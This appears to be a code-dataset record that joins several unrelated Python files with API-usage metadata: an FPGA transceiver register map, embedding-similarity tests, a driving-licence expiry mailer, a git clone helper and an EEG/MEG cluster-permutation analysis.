(['loaded_image', 'tf.uint8'], {}), '(loaded_image, tf.uint8)\n', (1594, 1618), True, 'import tensorflow as tf\n'), ((1674, 1708), 'tensorflow.train.Features', 'tf.train.Features', ([], {'feature': 'feature'}), '(feature=feature)\n', (1691, 1708), True, 'import tensorflow as tf\n')]
|
#!/usr/bin/env python
#-----------------------------------------------------------------------------
# Title : PyRogue Gtpe2Common
#-----------------------------------------------------------------------------
# File : Gtpe2Common.py
# Created : 2017-04-12
#-----------------------------------------------------------------------------
# Description:
# PyRogue Gtpe2Common
#-----------------------------------------------------------------------------
# This file is part of the rogue software platform. It is subject to
# the license terms in the LICENSE.txt file found in the top-level directory
# of this distribution and at:
# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
# No part of the rogue software platform, including this file, may be
# copied, modified, propagated, or distributed except according to the terms
# contained in the LICENSE.txt file.
#-----------------------------------------------------------------------------
import pyrogue as pr
class Gtpe2Common(pr.Device):
def __init__( self,
name = "Gtpe2Common",
description = "Gtpe2Common",
**kwargs):
super().__init__(name=name, description=description, **kwargs)
##############################
# Variables
##############################
self.add(pr.RemoteVariable(
name = "PLL0_CFG_WRD0",
description = "",
offset = (0x0002<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL0_CFG_WRD1",
description = "",
offset = (0x0003<<2),
bitSize = 11,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL0_REFCLK_DIV",
description = "",
offset = (0x0004<<2),
bitSize = 5,
bitOffset = 9,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL0_FBDIV_45",
description = "",
offset = (0x0004<<2),
bitSize = 1,
bitOffset = 7,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL0_FBDIV",
description = "",
offset = (0x0004<<2),
bitSize = 6,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL0_LOCK_CFG",
description = "",
offset = (0x0005<<2),
bitSize = 9,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL0_INIT_CFG_WRD0",
description = "",
offset = (0x0006<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL0_INIT_CFG_WRD1",
description = "",
offset = (0x0007<<2),
bitSize = 8,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "RSVD_ATTR0",
description = "",
offset = (0x000A<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL1_DMON_CFG",
description = "",
offset = (0x000F<<2),
bitSize = 1,
bitOffset = 1,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL0_DMON_CFG",
description = "",
offset = (0x000F<<2),
bitSize = 1,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "COMMON_CFG_WRD0",
description = "",
offset = (0x0011<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "COMMON_CFG_WRD1",
description = "",
offset = (0x0012<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL_CLKOUT_CFG",
description = "",
offset = (0x0013<<2),
bitSize = 8,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "BIAS_CFG_WRD0",
description = "",
offset = (0x0019<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "BIAS_CFG_WRD1",
description = "",
offset = (0x001A<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "BIAS_CFG_WRD2",
description = "",
offset = (0x001B<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "BIAS_CFG_WRD3",
description = "",
offset = (0x001C<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "RSVD_ATTR1",
description = "",
offset = (0x0024<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL1_INIT_CFG_WRD0",
description = "",
offset = (0x0028<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL1_INIT_CFG_WRD1",
description = "",
offset = (0x0029<<2),
bitSize = 8,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL1_LOCK_CFG",
description = "",
offset = (0x002A<<2),
bitSize = 9,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL1_REFCLK_DIV",
description = "",
offset = (0x002B<<2),
bitSize = 5,
bitOffset = 9,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL1_FBDIV_45",
description = "",
offset = (0x002B<<2),
bitSize = 1,
bitOffset = 7,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL1_FBDIV",
description = "",
offset = (0x002B<<2),
bitSize = 6,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL1_CFG_WRD0",
description = "",
offset = (0x002C<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL1_CFG_WRD1",
description = "",
offset = (0x002D<<2),
bitSize = 11,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
|
[
"pyrogue.RemoteVariable"
] |
[((1356, 1480), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL0_CFG_WRD0"""', 'description': '""""""', 'offset': '(2 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL0_CFG_WRD0', description='', offset=2 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (1373, 1480), True, 'import pyrogue as pr\n'), ((1663, 1787), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL0_CFG_WRD1"""', 'description': '""""""', 'offset': '(3 << 2)', 'bitSize': '(11)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL0_CFG_WRD1', description='', offset=3 << 2,\n bitSize=11, bitOffset=0, base=pr.UInt, mode='RW')\n", (1680, 1787), True, 'import pyrogue as pr\n'), ((1963, 2088), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL0_REFCLK_DIV"""', 'description': '""""""', 'offset': '(4 << 2)', 'bitSize': '(5)', 'bitOffset': '(9)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL0_REFCLK_DIV', description='', offset=4 << 2,\n bitSize=5, bitOffset=9, base=pr.UInt, mode='RW')\n", (1980, 2088), True, 'import pyrogue as pr\n'), ((2266, 2389), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL0_FBDIV_45"""', 'description': '""""""', 'offset': '(4 << 2)', 'bitSize': '(1)', 'bitOffset': '(7)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL0_FBDIV_45', description='', offset=4 << 2,\n bitSize=1, bitOffset=7, base=pr.UInt, mode='RW')\n", (2283, 2389), True, 'import pyrogue as pr\n'), ((2572, 2693), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL0_FBDIV"""', 'description': '""""""', 'offset': '(4 << 2)', 'bitSize': '(6)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL0_FBDIV', description='', offset=4 << 2, bitSize\n =6, bitOffset=0, base=pr.UInt, mode='RW')\n", (2589, 2693), True, 'import pyrogue as pr\n'), ((2870, 2993), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL0_LOCK_CFG"""', 'description': '""""""', 'offset': '(5 << 2)', 'bitSize': '(9)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL0_LOCK_CFG', description='', offset=5 << 2,\n bitSize=9, bitOffset=0, base=pr.UInt, mode='RW')\n", (2887, 2993), True, 'import pyrogue as pr\n'), ((3169, 3298), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL0_INIT_CFG_WRD0"""', 'description': '""""""', 'offset': '(6 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL0_INIT_CFG_WRD0', description='', offset=6 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (3186, 3298), True, 'import pyrogue as pr\n'), ((3476, 3604), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL0_INIT_CFG_WRD1"""', 'description': '""""""', 'offset': '(7 << 2)', 'bitSize': '(8)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL0_INIT_CFG_WRD1', description='', offset=7 << 2,\n bitSize=8, bitOffset=0, base=pr.UInt, mode='RW')\n", (3493, 3604), True, 'import pyrogue as pr\n'), ((3780, 3902), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""RSVD_ATTR0"""', 'description': '""""""', 'offset': '(10 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='RSVD_ATTR0', description='', offset=10 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (3797, 3902), True, 'import pyrogue as pr\n'), ((4086, 4210), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL1_DMON_CFG"""', 'description': '""""""', 'offset': '(15 << 2)', 'bitSize': '(1)', 'bitOffset': '(1)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL1_DMON_CFG', description='', offset=15 << 2,\n bitSize=1, bitOffset=1, base=pr.UInt, mode='RW')\n", (4103, 4210), True, 'import pyrogue as pr\n'), ((4386, 4510), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL0_DMON_CFG"""', 'description': '""""""', 'offset': '(15 << 2)', 'bitSize': '(1)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL0_DMON_CFG', description='', offset=15 << 2,\n bitSize=1, bitOffset=0, base=pr.UInt, mode='RW')\n", (4403, 4510), True, 'import pyrogue as pr\n'), ((4694, 4821), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""COMMON_CFG_WRD0"""', 'description': '""""""', 'offset': '(17 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='COMMON_CFG_WRD0', description='', offset=17 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (4711, 4821), True, 'import pyrogue as pr\n'), ((5000, 5127), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""COMMON_CFG_WRD1"""', 'description': '""""""', 'offset': '(18 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='COMMON_CFG_WRD1', description='', offset=18 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (5017, 5127), True, 'import pyrogue as pr\n'), ((5303, 5428), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL_CLKOUT_CFG"""', 'description': '""""""', 'offset': '(19 << 2)', 'bitSize': '(8)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL_CLKOUT_CFG', description='', offset=19 << 2,\n bitSize=8, bitOffset=0, base=pr.UInt, mode='RW')\n", (5320, 5428), True, 'import pyrogue as pr\n'), ((5605, 5730), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""BIAS_CFG_WRD0"""', 'description': '""""""', 'offset': '(25 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='BIAS_CFG_WRD0', description='', offset=25 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (5622, 5730), True, 'import pyrogue as pr\n'), ((5908, 6033), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""BIAS_CFG_WRD1"""', 'description': '""""""', 'offset': '(26 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='BIAS_CFG_WRD1', description='', offset=26 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (5925, 6033), True, 'import pyrogue as pr\n'), ((6227, 6352), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""BIAS_CFG_WRD2"""', 'description': '""""""', 'offset': '(27 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='BIAS_CFG_WRD2', description='', offset=27 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (6244, 6352), True, 'import pyrogue as pr\n'), ((6530, 6655), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""BIAS_CFG_WRD3"""', 'description': '""""""', 'offset': '(28 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='BIAS_CFG_WRD3', description='', offset=28 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (6547, 6655), True, 'import pyrogue as pr\n'), ((6836, 6958), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""RSVD_ATTR1"""', 'description': '""""""', 'offset': '(36 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='RSVD_ATTR1', description='', offset=36 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (6853, 6958), True, 'import pyrogue as pr\n'), ((7137, 7267), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL1_INIT_CFG_WRD0"""', 'description': '""""""', 'offset': '(40 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL1_INIT_CFG_WRD0', description='', offset=40 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (7154, 7267), True, 'import pyrogue as pr\n'), ((7447, 7576), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL1_INIT_CFG_WRD1"""', 'description': '""""""', 'offset': '(41 << 2)', 'bitSize': '(8)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL1_INIT_CFG_WRD1', description='', offset=41 << 2,\n bitSize=8, bitOffset=0, base=pr.UInt, mode='RW')\n", (7464, 7576), True, 'import pyrogue as pr\n'), ((7753, 7877), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL1_LOCK_CFG"""', 'description': '""""""', 'offset': '(42 << 2)', 'bitSize': '(9)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL1_LOCK_CFG', description='', offset=42 << 2,\n bitSize=9, bitOffset=0, base=pr.UInt, mode='RW')\n", (7770, 7877), True, 'import pyrogue as pr\n'), ((8078, 8204), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL1_REFCLK_DIV"""', 'description': '""""""', 'offset': '(43 << 2)', 'bitSize': '(5)', 'bitOffset': '(9)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL1_REFCLK_DIV', description='', offset=43 << 2,\n bitSize=5, bitOffset=9, base=pr.UInt, mode='RW')\n", (8095, 8204), True, 'import pyrogue as pr\n'), ((8381, 8505), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL1_FBDIV_45"""', 'description': '""""""', 'offset': '(43 << 2)', 'bitSize': '(1)', 'bitOffset': '(7)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL1_FBDIV_45', description='', offset=43 << 2,\n bitSize=1, bitOffset=7, base=pr.UInt, mode='RW')\n", (8398, 8505), True, 'import pyrogue as pr\n'), ((8687, 8808), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL1_FBDIV"""', 'description': '""""""', 'offset': '(43 << 2)', 'bitSize': '(6)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL1_FBDIV', description='', offset=43 << 2,\n bitSize=6, bitOffset=0, base=pr.UInt, mode='RW')\n", (8704, 8808), True, 'import pyrogue as pr\n'), ((8985, 9110), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL1_CFG_WRD0"""', 'description': '""""""', 'offset': '(44 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL1_CFG_WRD0', description='', offset=44 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (9002, 9110), True, 'import pyrogue as pr\n'), ((9292, 9417), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL1_CFG_WRD1"""', 'description': '""""""', 'offset': '(45 << 2)', 'bitSize': '(11)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL1_CFG_WRD1', description='', offset=45 << 2,\n bitSize=11, bitOffset=0, base=pr.UInt, mode='RW')\n", (9309, 9417), True, 'import pyrogue as pr\n')]
|
import pytest
import json
from ..embedding.model import EmbeddingModel
from ..feature_extraction import FeatureExtraction
import numpy as np
class TestFeatureExtraction():
@classmethod
def setup_class(self):
self.embedder_DE = EmbeddingModel(lang="de")
self.embedder_EN = EmbeddingModel(lang="en")
self.fe_DE = FeatureExtraction(self.embedder_DE, None)
self.fe_EN = FeatureExtraction(self.embedder_EN, None)
def test_mean_of_pairwise_cosine_distances(self):
ems = np.array([
[-1,1,1],
[-11,3,9],
[22,0,8]
], dtype=float)
assert abs(0.9770 - FeatureExtraction.mean_of_pairwise_cosine_distances(ems)) < 1e-4
def test_keywords_similarity_DE(self):
keywords_sim = [
"Huhn",
"Ei",
"Vogel",
"Geflügel"
]
keywords_diff = [
"Code",
"Geflügel",
"Siebträger",
"<NAME>"
]
ss_sim = self.fe_DE.get_keywords_similarity(keywords_sim)
ss_diff = self.fe_DE.get_keywords_similarity(keywords_diff)
assert ss_sim < ss_diff
def test_keywords_similarity_empty_DE(self):
empty = []
ss = self.fe_DE.get_keywords_similarity(empty)
assert ss == 0
def test_keywords_similarity_one_DE(self):
empty = ["test"]
ss = self.fe_DE.get_keywords_similarity(empty)
assert ss == 0
def test_keywords_similarity_EN(self):
keywords_sim = [
"Chicken",
"Egg",
"Bird",
"Poultry"
]
keywords_diff = [
"Code",
"Poultry",
"Portafilter",
"Donald Trump"
]
ss_sim = self.fe_EN.get_keywords_similarity(keywords_sim)
ss_diff = self.fe_EN.get_keywords_similarity(keywords_diff)
assert ss_sim < ss_diff
def test_keywords_similarity_empty_EN(self):
empty = []
ss = self.fe_EN.get_keywords_similarity(empty)
assert ss == 0
def test_keywords_similarity_one_EN(self):
empty = ["test"]
ss = self.fe_EN.get_keywords_similarity(empty)
assert ss == 0
|
[
"numpy.array"
] |
[((518, 578), 'numpy.array', 'np.array', (['[[-1, 1, 1], [-11, 3, 9], [22, 0, 8]]'], {'dtype': 'float'}), '([[-1, 1, 1], [-11, 3, 9], [22, 0, 8]], dtype=float)\n', (526, 578), True, 'import numpy as np\n')]
|
import config
import mailer
import datetime
import dbcon
from dateutil.relativedelta import *
personen = dbcon.personen()
abteilungsconfig = dbcon.abteilungsconfig()
for p in dbcon.persons_fuehr():
person = {}
person["id"] = str(p[0])
person["abteilung"] = str(p[1])
person["anrede"] = str(p[2])
person["name"] = str(p[3])
person["vorname"] = p[4]
person["fuehrerschein"] = p[5]
person["pruefokdat"] = "N/A"
person["pruefnextdat"] = "N/A"
person["ungueltig"] = ""
pruefokdat = dbcon.pruefokdat_fuehr(p[0])
if isinstance(pruefokdat[0], datetime.date):
person["pruefokdat"] = pruefokdat[0].isoformat()
pruefnextdat = dbcon.pruefnextdat_fuehr(person["id"], pruefokdat)
if isinstance(pruefnextdat[0], datetime.date):
person["pruefnextdat"] = pruefnextdat[0].isoformat()
today = datetime.date.today()
if pruefnextdat[0] < today :
person["ungueltig"] = "<font color=red>ungültig</font>"
else:
if pruefnextdat[0] < today+relativedelta(months=3) :
person["ungueltig"] = "<font color=orange>kontaktieren!</font>"
else :
pruefnextdat = dbcon.pruefnextdat_fuehr(person["id"])
if isinstance(pruefnextdat[0], datetime.date):
person["pruefnextdat"] = pruefnextdat[0].isoformat()
today = datetime.date.today()
if pruefnextdat[0] < today :
person["ungueltig"] = "<font color=red>ungültig</font>"
else:
if pruefnextdat[0] < today+relativedelta(months=3) :
person["ungueltig"] = "<font color=orange>kontaktieren!</font>"
else :
person["pruefnextdat"] = "N/A"
person["ungueltig"] = "<font color=red>ungültig</font>"
if abteilungsconfig[person["abteilung"]]["send_fuehr"] == "1":
person["fuehrerschein"] = person["fuehrerschein"].replace("C1", "XX")
person["fuehrerschein"] = person["fuehrerschein"].replace("c1", "XX")
if "C" in person["fuehrerschein"] or (abteilungsconfig[person["abteilung"]]["include_c1_drivers"] == "1" and "XX" in person["fuehrerschein"] ) :
person["fuehrerschein"] = person["fuehrerschein"].replace("XX", "C1")
personen[person["abteilung"]].append(person)
print("DEBUG: ================= personen dict ================= " )
print(personen)
print("DEBUG: ================= abteilungsconfig dict ================= ")
print(abteilungsconfig)
for k in personen.keys():
mailer.send_mail_fuehr(k, personen[k])
|
[
"dbcon.persons_fuehr",
"dbcon.abteilungsconfig",
"mailer.send_mail_fuehr",
"dbcon.pruefokdat_fuehr",
"datetime.date.today",
"dbcon.pruefnextdat_fuehr",
"dbcon.personen"
] |
[((106, 122), 'dbcon.personen', 'dbcon.personen', ([], {}), '()\n', (120, 122), False, 'import dbcon\n'), ((142, 166), 'dbcon.abteilungsconfig', 'dbcon.abteilungsconfig', ([], {}), '()\n', (164, 166), False, 'import dbcon\n'), ((177, 198), 'dbcon.persons_fuehr', 'dbcon.persons_fuehr', ([], {}), '()\n', (196, 198), False, 'import dbcon\n'), ((501, 529), 'dbcon.pruefokdat_fuehr', 'dbcon.pruefokdat_fuehr', (['p[0]'], {}), '(p[0])\n', (523, 529), False, 'import dbcon\n'), ((2394, 2432), 'mailer.send_mail_fuehr', 'mailer.send_mail_fuehr', (['k', 'personen[k]'], {}), '(k, personen[k])\n', (2416, 2432), False, 'import mailer\n'), ((650, 700), 'dbcon.pruefnextdat_fuehr', 'dbcon.pruefnextdat_fuehr', (["person['id']", 'pruefokdat'], {}), "(person['id'], pruefokdat)\n", (674, 700), False, 'import dbcon\n'), ((1126, 1164), 'dbcon.pruefnextdat_fuehr', 'dbcon.pruefnextdat_fuehr', (["person['id']"], {}), "(person['id'])\n", (1150, 1164), False, 'import dbcon\n'), ((825, 846), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (844, 846), False, 'import datetime\n'), ((1289, 1310), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (1308, 1310), False, 'import datetime\n')]
|
import git
class RemotePackage:
def __init__(self, url: str, name: str, download: bool = True):
self.repo = git.Repo.clone_from(url, to_path=name)
class LocalPackage:
def __init__(self, path):
self.path = path
|
[
"git.Repo.clone_from"
] |
[((122, 160), 'git.Repo.clone_from', 'git.Repo.clone_from', (['url'], {'to_path': 'name'}), '(url, to_path=name)\n', (141, 160), False, 'import git\n')]
|
"""
Apply cluster correction for independent-samples T-test based on spatial proximity and cluster size.
Inspired by MNE tutorial.
Created on Fri Feb 22 13:21:40 2019
@author: <NAME> <<EMAIL>>
"""
import numpy as np
from scipy import stats
from scipy.io import loadmat
import matplotlib.pyplot as plt
import os
from permutation_cluster_test_AT import _permutation_cluster_test_AT
print(__doc__)
#%% file paths
conn = '/media/cbru/SMEDY/scripts_speech_rest/stats/mantel/connectivity.npy'
results_dir = '/media/cbru/SMEDY/results/dys_con_contrast/2020_02_redo_subject_perm/'
read_dir = '/media/cbru/SMEDY/DATA/group_fake_iscs/'
#%% read connectivity
print('Read connectivity.')
connectivity = np.load(conn)
connectivity_sparse = connectivity[()]
#%% cluster correction
# for each permutation:
# 1. Compute the test statistic for each voxel individually.
# 2. Threshold the test statistic values.
# 3. Cluster voxels that exceed this threshold (with the same sign) based on adjacency.
# 4. Retain the size of the largest cluster (measured, e.g., by a simple voxel count,
# or by the sum of voxel t-values within the cluster) to build the null distribution.
# define conditions
cons = '_1' # '_1' listening to speech
freqs = {'5.000000e-01-4Hz', '4-8Hz', '8-12Hz', '12-25Hz', '25-45Hz', '55-90Hz'}
if cons == '_1':
window = '_613'
elif cons == '_2':
window = '_579'
else:
print('Check condition!')
for freq in freqs:
if os.path.isfile(read_dir + 'fake_t_vals_' + freq + window + cons + '.mat'):
print(cons + ' ' + freq)
# read in fake and actual T-test results
fake_values = loadmat(read_dir + 'fake_t_vals_' + freq +
window + cons + '.mat')['fake_t_vals']
real_values = loadmat(read_dir + 'real_t_vals_' + freq + window + cons +
'.mat')['real_t_vals']
# get threshold
threshold = loadmat(read_dir + 'tthreshold_uncorrected_' + freq +
window + cons + '.mat')['tthreshold_uncorrected']
print(threshold)
# reshape fake_values to (n_observations, n_times, n_vertices)
fake_values = fake_values[:, :, np.newaxis]
fake_values = fake_values.reshape((5000, 1, 20484))
# reshape real_values
real_values = real_values[:, :, np.newaxis]
real_values = real_values.reshape((1, 1, 20484))
# search for clusters (only once)
# max_clu_lens, clusters = _permutation_cluster_test_AT(fake_values,
# threshold=threshold[0][0],
# n_permutations=5000,
# tail=0,
# connectivity=connectivity_sparse,
# n_jobs=4, seed=10,
# max_step=1, t_power=1,
# out_type='indices',
# exclude=None,
# step_down_p=0,
# check_disjoint=False,
# buffer_size=1000)
#
# np.save(results_dir + 'max_clu_lens_' + freq + window + cons, max_clu_lens)
max_clu_lens = np.load(results_dir + 'max_clu_lens_' + freq + window + cons + '.npy')
# null distribution
plt.figure(0)
plt.hist(max_clu_lens)
kde = stats.gaussian_kde(max_clu_lens)
x = np.linspace(max_clu_lens.min(), max_clu_lens.max(), 100)
p = kde(x)
# cutoff for a cluster size that is significant
plt.figure(1)
plt.plot(x, p)
plt.hlines(0.095, 0, 14) # visualization of cutoff
# take maximum across all freq bands
cutoff = np.max(max_clu_lens)
print(['cutoff length is ', cutoff])
max_clu_lens2, clusters = _permutation_cluster_test_AT(real_values,
threshold=threshold[0][0],
n_permutations=1,
tail=0,
connectivity=connectivity_sparse,
n_jobs=4, seed=10,
max_step=1,
t_power=1,
out_type='indices',
exclude=None,
step_down_p=0,
check_disjoint=False,
buffer_size=1000)
# length of all initial clusters
clu_lens = np.zeros(len(clusters))
for j in range(0, len(clusters)):
clu_lens[j] = len(clusters[j][0])
# hists
plt.figure(1)
plt.hist(max_clu_lens)
plt.hist(clu_lens)
# out in format required by MNE cluster function (for visualization)
t_out = real_values.reshape(1, 20484)
clusters_new = clusters
for c, l, i in zip(clusters, clu_lens, range(0, len(clusters))):
clusters_new[i] = np.zeros(np.int(l), dtype='int'), c[0]
clu = t_out, clusters_new
np.save(results_dir + 'clu_' + freq + window + cons, clu)
# see how many clusters exceed the threshold (i.e. survive the correction)
ids = np.where(clu_lens > cutoff)[0]
clu_sig = clusters[0:len(ids)]
for i in range(0, len(ids)):
clu_sig[i] = clusters[ids[i]]
sig_clu_lens = np.zeros(len(clu_sig))
for j in range(0, len(clu_sig)):
sig_clu_lens[j] = len(clu_sig[j][0])
else: print('No uncorrected p-vals < 0.05 for ' + freq)
|
[
"permutation_cluster_test_AT._permutation_cluster_test_AT",
"numpy.load",
"numpy.save",
"matplotlib.pyplot.hist",
"matplotlib.pyplot.plot",
"scipy.io.loadmat",
"scipy.stats.gaussian_kde",
"os.path.isfile",
"matplotlib.pyplot.figure",
"numpy.max",
"numpy.where",
"numpy.int",
"matplotlib.pyplot.hlines"
] |
